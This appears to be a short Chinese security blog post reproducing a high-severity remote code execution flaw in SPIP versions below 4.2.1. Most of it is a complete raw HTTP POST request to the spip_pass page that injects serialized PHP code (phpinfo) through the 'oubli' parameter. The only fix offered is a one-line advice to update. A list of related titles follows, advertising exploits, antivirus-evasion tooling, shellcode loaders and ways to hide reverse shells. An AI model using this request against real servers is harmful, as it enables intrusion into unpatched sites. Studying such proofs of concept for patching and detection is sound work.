0x01 前言

0x02 漏洞等级

高

SPIP  < 4.2.1

0x04 漏洞复现

/spip.php?page=spip_pass

POST /spip.php?page=spip_pass HTTP/1.1Host: 1.1.1.1Content-Length: 185Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: cibcInit=ouiConnection: close
page=spip_pass&formulaire_action=oubli&formulaire_action_args=E1nK0hfOPllDtCUbG6L94SlEpZi7Vz17IKUbf0ZB6ET0WbEHeXrw9tNNCEWjm0ac0%2F4DuboKIZvygjRh&oubli=s:19:"<?php phpinfo(); ?>";&nobot=

0x05 修复方案

建议及时更新至最新版本。

1. ☆☆☆☆☆ | CVE-2023-33246 RCE漏洞（附EXP）

2. ☆☆☆☆☆ | 横向移动与域控权限维持方法总汇

3. ☆☆☆☆☆ | Apache HTTPd最新RCE漏洞复现
   

4. ☆☆☆☆☆ | CNVD-2023-34111 RCE漏洞（附EXP）
   

5. ☆☆☆☆☆ | Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

6. ☆☆☆☆☆ | MySQL数据库利用姿势

7. ☆☆☆☆☆ | phpMyAdmin漏洞利用汇总

8. ☆☆☆☆☆ | 泛微E-Mobile任意文件上传漏洞（附EXP）

9. ☆☆☆☆☆ | 小技巧~用一条命令来隐藏反向Shell

10. ☆☆☆☆☆ | New免杀ShellCode加载器（附下载）

11. ☆☆☆☆☆ | 红队攻防 | 解决HW被疯狂封IP姿势～（附下载）